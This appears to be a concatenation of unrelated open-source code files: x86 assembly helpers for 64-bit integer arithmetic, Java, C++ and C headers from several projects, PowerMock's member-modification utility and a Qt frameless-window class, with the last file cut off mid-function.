eax,edx ; edx:eax <- remainder xor edx,edx dec edi ; check result sign flag jns short L4 ; negate result, restore stack and return jmp short L8 ; result sign ok, restore stack and return ; ; Here we do it the hard way. Remember, eax contains the high word of DVSR ; L3: mov ebx,eax ; ebx:ecx <- divisor mov ecx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L5: shr ebx,1 ; shift divisor right one bit rcr ecx,1 shr edx,1 ; shift dividend right one bit rcr eax,1 or ebx,ebx jnz short L5 ; loop until divisor < 4194304K div ecx ; now divide, ignore remainder ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mov ecx,eax ; save a copy of quotient in ECX mul CRT_HIWORD(DVSR) xchg ecx,eax ; save product, get quotient in EAX mul CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L6 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract the original divisor from the result. 
; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L6 ; if result > original, do subtract jb short L7 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L7 ; if less or equal we are ok, else subtract L6: sub eax,CRT_LOWORD(DVSR) ; subtract divisor from result sbb edx,CRT_HIWORD(DVSR) L7: ; ; Calculate remainder by subtracting the result from the original dividend. ; Since the result is already in a register, we will do the subtract in the ; opposite direction and negate the result if necessary. ; sub eax,CRT_LOWORD(DVND) ; subtract dividend from result sbb edx,CRT_HIWORD(DVND) ; ; Now check the result sign flag to see if the result is supposed to be positive ; or negative. It is currently negated (because we subtracted in the 'wrong' ; direction), so if the sign flag is set we are done, otherwise we must negate ; the result to make it positive again. ; dec edi ; check result sign flag jns short L8 ; result is ok, restore stack and return L4: neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Just the cleanup left to do. edx:eax contains the quotient. ; Restore the saved registers and return. ; L8: pop edi pop ebx ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _allshl() { __asm { ; ; Handle shifts of 64 or more bits (all get 0) ; cmp cl, 64 jae short RETZERO ; ; Handle shifts of between 0 and 31 bits ; cmp cl, 32 jae short MORE32 shld edx,eax,cl shl eax,cl ret ; ; Handle shifts of between 32 and 63 bits ; MORE32: mov edx,eax xor eax,eax and cl,31 shl edx,cl ret ; ; return 0 in edx:eax ; RETZERO: xor eax,eax xor edx,edx ret } } __declspec(naked) void _allshr() { __asm { ; ; Handle shifts of 64 bits or more (if shifting 64 bits or more, the result ; depends only on the high order bit of edx). ; cmp cl,64 jae short RETSIGN ; ; Handle shifts of between 0 and 31 bits ; cmp cl, 32 jae short MORE32 shrd eax,edx,cl sar edx,cl ret ; ; Handle shifts of between 32 and 63 bits ; MORE32: mov eax,edx sar edx,31 and cl,31 sar eax,cl ret ; ; Return double precision 0 or -1, depending on the sign of edx ; RETSIGN: sar edx,31 mov eax,edx ret } } __declspec(naked) void _aulldiv() { #define DVND esp + 12 // stack address of dividend (a) #define DVSR esp + 20 // stack address of divisor (b) __asm { push ebx push esi ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; mov eax,CRT_HIWORD(DVSR) ; check to see if divisor < 4194304K or eax,eax jnz short L1 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; get high order bits of quotient mov ebx,eax ; save high bits of quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; get low order bits of quotient mov edx,ebx ; edx:eax <- quotient hi:quotient lo jmp short L2 ; restore stack and return ; ; Here we do it the hard way. 
Remember, eax contains DVSRHI ; L1: mov ecx,eax ; ecx:ebx <- divisor mov ebx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L3: shr ecx,1 ; shift divisor right one bit; hi bit <- 0 rcr ebx,1 shr edx,1 ; shift dividend right one bit; hi bit <- 0 rcr eax,1 or ecx,ecx jnz short L3 ; loop until divisor < 4194304K div ebx ; now divide, ignore remainder mov esi,eax ; save quotient ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mul CRT_HIWORD(DVSR) ; QUOT * CRT_HIWORD(DVSR) mov ecx,eax mov eax,CRT_LOWORD(DVSR) mul esi ; QUOT * CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L4 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract one (1) from the quotient. ; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L4 ; if result > original, do subtract jb short L5 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L5 ; if less or equal we are ok, else subtract L4: dec esi ; subtract 1 from quotient L5: xor edx,edx ; edx:eax <- quotient mov eax,esi ; ; Just the cleanup left to do. edx:eax contains the quotient. ; Restore the saved registers and return. ; L2: pop esi pop ebx ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _aulldvrm() { #define DVND esp + 8 // stack address of dividend (a) #define DVSR esp + 16 // stack address of divisor (b) __asm { push esi ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; mov eax,CRT_HIWORD(DVSR) ; check to see if divisor < 4194304K or eax,eax jnz short L1 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; get high order bits of quotient mov ebx,eax ; save high bits of quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; get low order bits of quotient mov esi,eax ; ebx:esi <- quotient ; ; Now we need to do a multiply so that we can compute the remainder. ; mov eax,ebx ; set up high word of quotient mul CRT_LOWORD(DVSR) ; CRT_HIWORD(QUOT) * DVSR mov ecx,eax ; save the result in ecx mov eax,esi ; set up low word of quotient mul CRT_LOWORD(DVSR) ; CRT_LOWORD(QUOT) * DVSR add edx,ecx ; EDX:EAX = QUOT * DVSR jmp short L2 ; complete remainder calculation ; ; Here we do it the hard way. Remember, eax contains DVSRHI ; L1: mov ecx,eax ; ecx:ebx <- divisor mov ebx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L3: shr ecx,1 ; shift divisor right one bit; hi bit <- 0 rcr ebx,1 shr edx,1 ; shift dividend right one bit; hi bit <- 0 rcr eax,1 or ecx,ecx jnz short L3 ; loop until divisor < 4194304K div ebx ; now divide, ignore remainder mov esi,eax ; save quotient ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. 
; mul CRT_HIWORD(DVSR) ; QUOT * CRT_HIWORD(DVSR) mov ecx,eax mov eax,CRT_LOWORD(DVSR) mul esi ; QUOT * CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L4 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract one (1) from the quotient. ; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L4 ; if result > original, do subtract jb short L5 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L5 ; if less or equal we are ok, else subtract L4: dec esi ; subtract 1 from quotient sub eax,CRT_LOWORD(DVSR) ; subtract divisor from result sbb edx,CRT_HIWORD(DVSR) L5: xor ebx,ebx ; ebx:esi <- quotient L2: ; ; Calculate remainder by subtracting the result from the original dividend. ; Since the result is already in a register, we will do the subtract in the ; opposite direction and negate the result. ; sub eax,CRT_LOWORD(DVND) ; subtract dividend from result sbb edx,CRT_HIWORD(DVND) neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Now we need to get the quotient into edx:eax and the remainder into ebx:ecx. ; mov ecx,edx mov edx,ebx mov ebx,ecx mov ecx,eax mov eax,esi ; ; Just the cleanup left to do. edx:eax contains the quotient. ; Restore the saved registers and return. ; pop esi ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _aullrem() { #define DVND esp + 8 // stack address of dividend (a) #define DVSR esp + 16 // stack address of divisor (b) __asm { push ebx ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; mov eax,CRT_HIWORD(DVSR) ; check to see if divisor < 4194304K or eax,eax jnz short L1 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; edx <- remainder, eax <- quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; edx <- final remainder mov eax,edx ; edx:eax <- remainder xor edx,edx jmp short L2 ; restore stack and return ; ; Here we do it the hard way. Remember, eax contains DVSRHI ; L1: mov ecx,eax ; ecx:ebx <- divisor mov ebx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L3: shr ecx,1 ; shift divisor right one bit; hi bit <- 0 rcr ebx,1 shr edx,1 ; shift dividend right one bit; hi bit <- 0 rcr eax,1 or ecx,ecx jnz short L3 ; loop until divisor < 4194304K div ebx ; now divide, ignore remainder ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mov ecx,eax ; save a copy of quotient in ECX mul CRT_HIWORD(DVSR) xchg ecx,eax ; put partial product in ECX, get quotient in EAX mul CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L4 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we're ok, otherwise ; subtract the original divisor from the result. 
; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L4 ; if result > original, do subtract jb short L5 ; if result < original, we're ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L5 ; if less or equal we're ok, else subtract L4: sub eax,CRT_LOWORD(DVSR) ; subtract divisor from result sbb edx,CRT_HIWORD(DVSR) L5: ; ; Calculate remainder by subtracting the result from the original dividend. ; Since the result is already in a register, we will perform the subtract in ; the opposite direction and negate the result to make it positive. ; sub eax,CRT_LOWORD(DVND) ; subtract original dividend from result sbb edx,CRT_HIWORD(DVND) neg edx ; and negate it neg eax sbb edx,0 ; ; Just the cleanup left to do. dx:ax contains the remainder. ; Restore the saved registers and return. ; L2: pop ebx ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _aullshr() { __asm { cmp cl,64 jae short RETZERO ; ; Handle shifts of between 0 and 31 bits ; cmp cl, 32 jae short MORE32 shrd eax,edx,cl shr edx,cl ret ; ; Handle shifts of between 32 and 63 bits ; MORE32: mov eax,edx xor edx,edx and cl,31 shr eax,cl ret ; ; return 0 in edx:eax ; RETZERO: xor eax,eax xor edx,edx ret } } #undef CRT_LOWORD #undef CRT_HIWORD #endif
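/*
 * Illustrative sketch, not part of the original file: the unsigned 64-bit
 * division algorithm that _aulldiv implements above, written in portable C
 * for readability. Names are made up; the real routine works on register
 * pairs, but the structure is the same: if the divisor fits in 32 bits do
 * two chained 32-bit divides, otherwise shift both operands right until it
 * does, take the (possibly one-too-large) quotient estimate, multiply back
 * and correct it by at most one.
 */
#include <stdint.h>

static uint64_t sketch_udiv64(uint64_t dvnd, uint64_t dvsr)
{
  if ((dvsr >> 32) == 0) {                               /* easy case: divisor < 2^32 */
    uint32_t d = (uint32_t)dvsr;
    uint64_t hi = dvnd >> 32;
    uint64_t q_hi = hi / d;                              /* high order bits of quotient */
    uint64_t rem = hi % d;
    uint64_t q_lo = ((rem << 32) | (uint32_t)dvnd) / d;  /* low order bits of quotient */
    return (q_hi << 32) | q_lo;
  }

  /* hard case: shift divisor (and dividend) right until the divisor fits in 32 bits */
  uint64_t a = dvnd, b = dvsr;
  while (b >> 32) {
    a >>= 1;
    b >>= 1;
  }

  uint64_t q = a / b;             /* estimate; never too small */
  if (q != 0 && dvnd / q < dvsr)  /* equivalent to q * dvsr > dvnd, without overflow */
    q--;                          /* estimate was off by one */
  return q;
}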
15,874
347
package org.ovirt.engine.ui.uicommonweb.models.vms; import java.util.List; import org.ovirt.engine.core.common.action.ActionParametersBase; import org.ovirt.engine.core.common.action.ActionType; import org.ovirt.engine.core.common.action.RemoveVmTemplateInterfaceParameters; import org.ovirt.engine.core.common.businessentities.network.VmNetworkInterface; import org.ovirt.engine.ui.uicommonweb.help.HelpTag; import org.ovirt.engine.ui.uicommonweb.models.ListModel; import org.ovirt.engine.ui.uicompat.ConstantsManager; public class RemoveVmTemplateInterfaceModel extends RemoveVmInterfaceModel{ public RemoveVmTemplateInterfaceModel(ListModel sourceListModel, List<VmNetworkInterface> vnics, boolean isFullMsg) { super(sourceListModel, vnics, isFullMsg); setHelpTag(HelpTag.remove_network_interface_tmps); setHashName("remove_network_interface_tmps"); //$NON-NLS-1$ } @Override protected String getRemoveVnicFullMsg(VmNetworkInterface vnic){ return ConstantsManager.getInstance().getMessages().vnicFromTemplate(vnic.getName(), vnic.getVmName()); } @Override protected ActionParametersBase getRemoveVmInterfaceParams(VmNetworkInterface vnic) { return new RemoveVmTemplateInterfaceParameters(vnic.getVmId(), vnic.getId()); } @Override protected ActionType getActionType() { return ActionType.RemoveVmTemplateInterface; } }
493
7,892
<gh_stars>1000+ /***************************************************/ /*! \class Generator \brief STK abstract unit generator parent class. This class provides common functionality for STK unit generator sample-source subclasses. by <NAME> and <NAME>, 1995 - 2005. */ /***************************************************/ #ifndef STK_GENERATOR_H #define STK_GENERATOR_H #include "Stk.h" namespace Nyq { class Generator : public Stk { public: //! Class constructor. Generator( void ); //! Class destructor. virtual ~Generator( void ); //! Return the last output value. virtual StkFloat lastOut( void ) const { return lastOutput_; }; //! Compute one sample and output. StkFloat tick( void ); //! Fill a channel of the StkFrames object with computed outputs. /*! The \c channel argument should be zero or greater (the first channel is specified by 0). An StkError will be thrown if the \c channel argument is equal to or greater than the number of channels in the StkFrames object. */ StkFrames& tick( StkFrames& frames, unsigned int channel = 0 ); protected: // This abstract function must be implemented in all subclasses. // It is used to get around a C++ problem with overloaded virtual // functions. virtual StkFloat computeSample( void ) = 0; StkFloat lastOutput_; }; } // namespace Nyq #endif
403
387
#pragma once namespace Arcane { class Singleton { public: Singleton(const Singleton &singleton) = delete; // Get rid of copy ctor Singleton(const Singleton &&singleton) = delete; // Get rid of move ctor Singleton& operator=(const Singleton &singleton) = delete; Singleton& operator=(const Singleton &&singleton) = delete; protected: Singleton() = default; virtual ~Singleton() = default; }; }
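// Illustrative sketch, not part of the original header: one way a concrete
// class might build on Arcane::Singleton. The base class only removes copy
// and move, so each derived type provides its own accessor; GetInstance()
// and the Renderer name are made up for the example, and the include path
// is assumed.
#include "Singleton.h"

namespace Arcane
{
	class Renderer : public Singleton
	{
	public:
		static Renderer& GetInstance()
		{
			static Renderer instance; // constructed on first use, destroyed at exit
			return instance;
		}

	private:
		Renderer() = default; // only GetInstance() may construct
	};
}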
138
2,707
<filename>jetlinks-components/gateway-component/src/main/java/org/jetlinks/community/gateway/spring/MessageListener.java package org.jetlinks.community.gateway.spring; import org.jetlinks.core.event.TopicPayload; import reactor.core.publisher.Mono; public interface MessageListener { Mono<Void> onMessage(TopicPayload message); }
106
6,497
package com.sohu.cache.dao;

import com.sohu.cache.entity.InstanceFault;

import java.util.List;

/**
 * Created by yijunzhang on 14-12-29.
 */
public interface InstanceFaultDao {

    /**
     * Add an InstanceFault record
     *
     * @return
     */
    int insert(InstanceFault instanceFault);

    /**
     * List faults for an instance
     *
     * @param instId
     * @return
     */
    List<InstanceFault> getListByInstId(int instId);

    /**
     * List faults for an application
     *
     * @param appId
     * @return
     */
    List<InstanceFault> getListByAppId(long appId);
}
318
3,075
<gh_stars>1000+ /* * Copyright 2009 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.powermock.api.support.membermodification; import org.powermock.api.support.SuppressCode; import org.powermock.api.support.membermodification.strategy.MethodReplaceStrategy; import org.powermock.api.support.membermodification.strategy.MethodStubStrategy; import org.powermock.api.support.membermodification.strategy.impl.MethodReplaceStrategyImpl; import org.powermock.api.support.membermodification.strategy.impl.MethodStubStrategyImpl; import java.lang.reflect.AccessibleObject; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.Method; /** * Contains various utilities for modifying members of classes such as * constructors, fields and methods. Modifying means e.g. changing return value * of method invocations or suppressing a constructor. */ public class MemberModifier extends MemberMatcher { /** * Suppress a specific method. This works on both instance methods and * static methods. */ public static void suppress(Method method) { SuppressCode.suppressMethod(method); } /** * Suppress multiple methods. This works on both instance methods and static * methods. */ public static void suppress(Method[] methods) { SuppressCode.suppressMethod(methods); } /** * Suppress a constructor. */ public static void suppress(Constructor<?> constructor) { SuppressCode.suppressConstructor(constructor); } /** * Suppress multiple constructors. */ public static void suppress(Constructor<?>[] constructors) { SuppressCode.suppressConstructor(constructors); } /** * Suppress a field. */ public static void suppress(Field field) { SuppressCode.suppressField(field); } /** * Suppress multiple fields. */ public static void suppress(Field[] fields) { SuppressCode.suppressField(fields); } /** * Suppress an array of accessible objects. */ public static void suppress(AccessibleObject[] accessibleObjects) { if (accessibleObjects == null) { throw new IllegalArgumentException("accessibleObjects cannot be null"); } for (AccessibleObject accessibleObject : accessibleObjects) { if (accessibleObject instanceof Constructor<?>) { SuppressCode.suppressConstructor((Constructor<?>) accessibleObject); } else if (accessibleObject instanceof Field) { SuppressCode.suppressField((Field) accessibleObject); } else if (accessibleObject instanceof Method) { SuppressCode.suppressMethod((Method) accessibleObject); } } } /** * Add a method that should be intercepted and return another value (i.e. * the method is stubbed). */ public static <T> MethodStubStrategy<T> stub(Method method) { return new MethodStubStrategyImpl<T>(method); } /** * Replace a method invocation. */ public static MethodReplaceStrategy replace(Method method) { return new MethodReplaceStrategyImpl(method); } }
1,265
839
<reponame>T-V-J/Qt-Frameless-Window-DarkStyle /* ############################################################################### # # # The MIT License # # # # Copyright (C) 2017 by <NAME> (<EMAIL>) # # >> https://github.com/Jorgen-VikingGod # # # # Sources: https://github.com/Jorgen-VikingGod/Qt-Frameless-Window-DarkStyle # # # ############################################################################### */ #include "framelesswindow.h" #include <QApplication> #include <QDesktopWidget> #include <QGraphicsDropShadowEffect> #include <QScreen> #include "ui_framelesswindow.h" FramelessWindow::FramelessWindow(QWidget *parent) : QWidget(parent), ui(new Ui::FramelessWindow), m_bMousePressed(false), m_bDragTop(false), m_bDragLeft(false), m_bDragRight(false), m_bDragBottom(false) { setWindowFlags(Qt::FramelessWindowHint | Qt::WindowSystemMenuHint); // append minimize button flag in case of windows, // for correct windows native handling of minimize function #if defined(Q_OS_WIN) setWindowFlags(windowFlags() | Qt::WindowMinimizeButtonHint); #endif setAttribute(Qt::WA_NoSystemBackground, true); setAttribute(Qt::WA_TranslucentBackground); ui->setupUi(this); ui->restoreButton->setVisible(false); // shadow under window title text QGraphicsDropShadowEffect *textShadow = new QGraphicsDropShadowEffect; textShadow->setBlurRadius(4.0); textShadow->setColor(QColor(0, 0, 0)); textShadow->setOffset(0.0); ui->titleText->setGraphicsEffect(textShadow); // window shadow QGraphicsDropShadowEffect *windowShadow = new QGraphicsDropShadowEffect; windowShadow->setBlurRadius(9.0); windowShadow->setColor(palette().color(QPalette::Highlight)); windowShadow->setOffset(0.0); ui->windowFrame->setGraphicsEffect(windowShadow); QObject::connect(qApp, &QGuiApplication::applicationStateChanged, this, &FramelessWindow::on_applicationStateChanged); setMouseTracking(true); // important to watch mouse move from all child widgets QApplication::instance()->installEventFilter(this); } FramelessWindow::~FramelessWindow() { delete ui; } void FramelessWindow::on_restoreButton_clicked() { ui->restoreButton->setVisible(false); ui->maximizeButton->setVisible(true); setWindowState(Qt::WindowNoState); // on MacOS this hack makes sure the // background window is repaint correctly hide(); show(); } void FramelessWindow::on_maximizeButton_clicked() { ui->restoreButton->setVisible(true); ui->maximizeButton->setVisible(false); this->setWindowState(Qt::WindowMaximized); this->showMaximized(); styleWindow(true, false); } void FramelessWindow::changeEvent(QEvent *event) { if (event->type() == QEvent::WindowStateChange) { if (windowState().testFlag(Qt::WindowNoState)) { ui->restoreButton->setVisible(false); ui->maximizeButton->setVisible(true); styleWindow(true, true); event->ignore(); } else if (windowState().testFlag(Qt::WindowMaximized)) { ui->restoreButton->setVisible(true); ui->maximizeButton->setVisible(false); styleWindow(true, false); event->ignore(); } } event->accept(); } void FramelessWindow::setContent(QWidget *w) { ui->windowContent->layout()->addWidget(w); } void FramelessWindow::setWindowTitle(const QString &text) { ui->titleText->setText(text); } void FramelessWindow::setWindowIcon(const QIcon &ico) { ui->icon->setPixmap(ico.pixmap(16, 16)); } void FramelessWindow::styleWindow(bool bActive, bool bNoState) { if (bActive) { if (bNoState) { layout()->setMargin(15); ui->windowTitlebar->setStyleSheet(QStringLiteral( "#windowTitlebar{border: 0px none palette(shadow); " "border-top-left-radius:5px; border-top-right-radius:5px; " 
"background-color:palette(shadow); height:20px;}")); ui->windowFrame->setStyleSheet(QStringLiteral( "#windowFrame{border:1px solid palette(highlight); border-radius:5px " "5px 5px 5px; background-color:palette(Window);}")); QGraphicsEffect *oldShadow = ui->windowFrame->graphicsEffect(); if (oldShadow) delete oldShadow; QGraphicsDropShadowEffect *windowShadow = new QGraphicsDropShadowEffect; windowShadow->setBlurRadius(9.0); windowShadow->setColor(palette().color(QPalette::Highlight)); windowShadow->setOffset(0.0); ui->windowFrame->setGraphicsEffect(windowShadow); } else { layout()->setMargin(0); ui->windowTitlebar->setStyleSheet(QStringLiteral( "#windowTitlebar{border: 0px none palette(shadow); " "border-top-left-radius:0px; border-top-right-radius:0px; " "background-color:palette(shadow); height:20px;}")); ui->windowFrame->setStyleSheet(QStringLiteral( "#windowFrame{border:1px solid palette(dark); border-radius:0px 0px " "0px 0px; background-color:palette(Window);}")); QGraphicsEffect *oldShadow = ui->windowFrame->graphicsEffect(); if (oldShadow) delete oldShadow; ui->windowFrame->setGraphicsEffect(nullptr); } // if (bNoState) else maximize } else { if (bNoState) { layout()->setMargin(15); ui->windowTitlebar->setStyleSheet(QStringLiteral( "#windowTitlebar{border: 0px none palette(shadow); " "border-top-left-radius:5px; border-top-right-radius:5px; " "background-color:palette(dark); height:20px;}")); ui->windowFrame->setStyleSheet(QStringLiteral( "#windowFrame{border:1px solid #000000; border-radius:5px 5px 5px " "5px; background-color:palette(Window);}")); QGraphicsEffect *oldShadow = ui->windowFrame->graphicsEffect(); if (oldShadow) delete oldShadow; QGraphicsDropShadowEffect *windowShadow = new QGraphicsDropShadowEffect; windowShadow->setBlurRadius(9.0); windowShadow->setColor(palette().color(QPalette::Shadow)); windowShadow->setOffset(0.0); ui->windowFrame->setGraphicsEffect(windowShadow); } else { layout()->setMargin(0); ui->windowTitlebar->setStyleSheet(QStringLiteral( "#titlebarWidget{border: 0px none palette(shadow); " "border-top-left-radius:0px; border-top-right-radius:0px; " "background-color:palette(dark); height:20px;}")); ui->windowFrame->setStyleSheet(QStringLiteral( "#windowFrame{border:1px solid palette(shadow); border-radius:0px " "0px 0px 0px; background-color:palette(Window);}")); QGraphicsEffect *oldShadow = ui->windowFrame->graphicsEffect(); if (oldShadow) delete oldShadow; ui->windowFrame->setGraphicsEffect(nullptr); } // if (bNoState) { else maximize } // if (bActive) { else no focus } void FramelessWindow::on_applicationStateChanged(Qt::ApplicationState state) { if (windowState().testFlag(Qt::WindowNoState)) { if (state == Qt::ApplicationActive) { styleWindow(true, true); } else { styleWindow(false, true); } } else if (windowState().testFlag(Qt::WindowFullScreen)) { if (state == Qt::ApplicationActive) { styleWindow(true, false); } else { styleWindow(false, false); } } } void FramelessWindow::on_minimizeButton_clicked() { setWindowState(Qt::WindowMinimized); } void FramelessWindow::on_closeButton_clicked() { close(); } void FramelessWindow::on_windowTitlebar_doubleClicked() { if (windowState().testFlag(Qt::WindowNoState)) { on_maximizeButton_clicked(); } else if (windowState().testFlag(Qt::WindowFullScreen)) { on_restoreButton_clicked(); } } void FramelessWindow::mouseDoubleClickEvent(QMouseEvent *event) { Q_UNUSED(event); } void FramelessWindow::checkBorderDragging(QMouseEvent *event) { if (isMaximized()) { return; } QPoint globalMousePos = event->globalPos(); if 
(m_bMousePressed) { QScreen *screen = QGuiApplication::primaryScreen(); // available geometry excludes taskbar QRect availGeometry = screen->availableGeometry(); int h = availGeometry.height(); int w = availGeometry.width(); QList<QScreen *> screenlist = screen->virtualSiblings(); if (screenlist.contains(screen)) { QSize sz = QApplication::desktop()->size(); h = sz.height(); w = sz.width(); } // top right corner if (m_bDragTop && m_bDragRight) { int diff = globalMousePos.x() - (m_StartGeometry.x() + m_StartGeometry.width()); int neww = m_StartGeometry.width() + diff; diff = globalMousePos.y() - m_StartGeometry.y(); int newy = m_StartGeometry.y() + diff; if (neww > 0 && newy > 0 && newy < h - 50) { QRect newg = m_StartGeometry; newg.setWidth(neww); newg.setX(m_StartGeometry.x()); newg.setY(newy); setGeometry(newg); } } // top left corner else if (m_bDragTop && m_bDragLeft) { int diff = globalMousePos.y() - m_StartGeometry.y(); int newy = m_StartGeometry.y() + diff; diff = globalMousePos.x() - m_StartGeometry.x(); int newx = m_StartGeometry.x() + diff; if (newy > 0 && newx > 0) { QRect newg = m_StartGeometry; newg.setY(newy); newg.setX(newx); setGeometry(newg); } } // bottom right corner else if (m_bDragBottom && m_bDragLeft) { int diff = globalMousePos.y() - (m_StartGeometry.y() + m_StartGeometry.height()); int newh = m_StartGeometry.height() + diff; diff = globalMousePos.x() - m_StartGeometry.x(); int newx = m_StartGeometry.x() + diff; if (newh > 0 && newx > 0) { QRect newg = m_StartGeometry; newg.setX(newx); newg.setHeight(newh); setGeometry(newg); } } else if (m_bDragTop) { int diff = globalMousePos.y() - m_StartGeometry.y(); int newy = m_StartGeometry.y() + diff; if (newy > 0 && newy < h - 50) { QRect newg = m_StartGeometry; newg.setY(newy); setGeometry(newg); } } else if (m_bDragLeft) { int diff = globalMousePos.x() - m_StartGeometry.x(); int newx = m_StartGeometry.x() + diff; if (newx > 0 && newx < w - 50) { QRect newg = m_StartGeometry; newg.setX(newx); setGeometry(newg); } } else if (m_bDragRight) { int diff = globalMousePos.x() - (m_StartGeometry.x() + m_StartGeometry.width()); int neww = m_StartGeometry.width() + diff; if (neww > 0) { QRect newg = m_StartGeometry; newg.setWidth(neww); newg.setX(m_StartGeometry.x()); setGeometry(newg); } } else if (m_bDragBottom) { int diff = globalMousePos.y() - (m_StartGeometry.y() + m_StartGeometry.height()); int newh = m_StartGeometry.height() + diff; if (newh > 0) { QRect newg = m_StartGeometry; newg.setHeight(newh); newg.setY(m_StartGeometry.y()); setGeometry(newg); } } } else { // no mouse pressed if (leftBorderHit(globalMousePos) && topBorderHit(globalMousePos)) { setCursor(Qt::SizeFDiagCursor); } else if (rightBorderHit(globalMousePos) && topBorderHit(globalMousePos)) { setCursor(Qt::SizeBDiagCursor); } else if (leftBorderHit(globalMousePos) && bottomBorderHit(globalMousePos)) { setCursor(Qt::SizeBDiagCursor); } else { if (topBorderHit(globalMousePos)) { setCursor(Qt::SizeVerCursor); } else if (leftBorderHit(globalMousePos)) { setCursor(Qt::SizeHorCursor); } else if (rightBorderHit(globalMousePos)) { setCursor(Qt::SizeHorCursor); } else if (bottomBorderHit(globalMousePos)) { setCursor(Qt::SizeVerCursor); } else { m_bDragTop = false; m_bDragLeft = false; m_bDragRight = false; m_bDragBottom = false; setCursor(Qt::ArrowCursor); } } } } // pos in global virtual desktop coordinates bool FramelessWindow::leftBorderHit(const QPoint &pos) { const QRect &rect = this->geometry(); if (pos.x() >= rect.x() && pos.x() <= rect.x() + 
